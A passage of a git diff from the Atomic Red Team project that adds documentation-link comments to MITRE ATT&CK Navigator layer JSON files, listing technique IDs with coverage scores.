"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T15
55.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atom
ics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 1b23e51b..4ee7afcc 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true
},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1072","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.0
01","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","s
core":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001",
"score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"
enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1
574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003"
,"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.0
01/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/
T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
cs/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/
